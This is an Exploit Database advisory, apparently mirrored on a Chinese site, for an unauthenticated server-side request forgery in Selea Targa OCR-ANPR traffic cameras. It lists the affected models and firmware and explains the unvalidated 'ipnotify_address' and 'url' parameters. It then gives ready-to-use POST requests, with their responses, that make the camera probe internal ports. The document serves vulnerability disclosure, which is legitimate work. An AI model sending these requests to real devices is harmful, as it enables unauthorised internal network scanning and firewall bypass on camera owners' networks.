Selea Targa IP OCR-ANPR Camera – Multiple SSRF (Unauthenticated)

• Exploit Database
• 13 阅读

• 作者： LiquidWorm
  日期： 2021-01-22
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/49457/

• # Exploit Title: Selea Targa IP OCR-ANPR Camera - Multiple SSRF (Unauthenticated)
  # Date: 07.11.2020
  # Exploit Author: LiquidWorm
  # Vendor Homepage: https://www.selea.com
  
  Selea Targa IP OCR-ANPR Camera Unauthenticated SSRF
  
  
  Vendor: Selea s.r.l.
  Product web page: https://www.selea.com
  Affected version: Model: iZero
   Targa 512
   Targa 504
   Targa Semplice
   Targa 704 TKM
   Targa 805
   Targa 710 INOX
   Targa 750
   Targa 704 ILB
  Firmware: BLD201113005214
  BLD201106163745
  BLD200304170901
  BLD200304170514
  BLD200303143345
  BLD191118145435
  BLD191021180140
  BLD191021180140
  CPS: 4.013(201105)
   3.100(200225)
   3.005(191206)
   3.005(191112)
  
  Summary: IP camera with optical character recognition (OCR) software for automatic
  number plate recognition (ANPR) also equipped with ADR system that enables it to read
  the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number
  of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number
  plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes
  this camera suitable for all installation conditions. Its built-in OCR software works
  as an automatic and independent system without the need of a computer, thus giving
  autonomy to the device even in the event of an interruption in the connection between
  the camera and the operations centre.
  
  Desc: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the
  Selea ANPR camera within several functionalities. The application parses user supplied
  data in the POST JSON parameters 'ipnotify_address' and 'url' to construct an image
  request or check DNS for IP notification. Since no validation is carried out on the
  parameters, an attacker can specify an external domain and force the application to
  make an HTTP request to an arbitrary destination host. This can be used by an external
  attacker for example to bypass firewalls and initiate a service and network enumeration
  on the internal network through the affected application.
  
  Tested on: GNU/Linux 3.10.53 (armv7l)
   PHP/5.6.22
   selea_httpd
   HttpServer/0.1
   SeleaCPSHttpServer/1.1
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2021-5617
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5617.php
  
  
  07.11.2020
  
  --
  
  
  Request:
  --------
  
  POST /cps/test_backup_server?ACTION=TEST_IP&NOCONTINUE=TRUE HTTP/1.1
  Host: 192.168.1.17
  
  {"test_type":"ip","test_debug":false,"ipnotify_type":"http/get","ipnotify_address":"http://127.0.0.1:80","ipnotify_username":"","ipnotify_password":"","ipnotify_port":"0","ipnotify_content_type":"","ipnotify_template":""}
  
  
  Response (port 80):
  -------------------
  
  {"bandwidth": 1.3571428571428572,"elapsed_ms": 14,"result": "OK","size": 19}
  
  
  Response (port 8080):
  ---------------------
  
  {"code": 500,"error": "Error sending notification: Connection refused"}
  
  
  Request:
  --------
  
  POST /cps/test_url HTTP/1.1
  Host: 192.168.1.17
  
  {"url":"http://127.0.0.1:80"}: 
  
  
  Response (port 80):
  -------------------
  
  {"elapsed_ms": 2,"jpeg": "GGh0bWw+CjxoZWFkPgo8dGl0bGU+U2VsZWEgQU5QU4BjYW1lcmE8L3RpdGxlPgo8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwO1VSTD0vbhl2ZS5odG1sIj4KPC9oZWFkPgo8Ym9keT48L2JvJHk+CjwvaHRtbD4KCg==","result": "OK"}
  
  
  Response (port 8081):
  ---------------------
  
  {"elapsed_ms": 1,"error": "Connection refused"}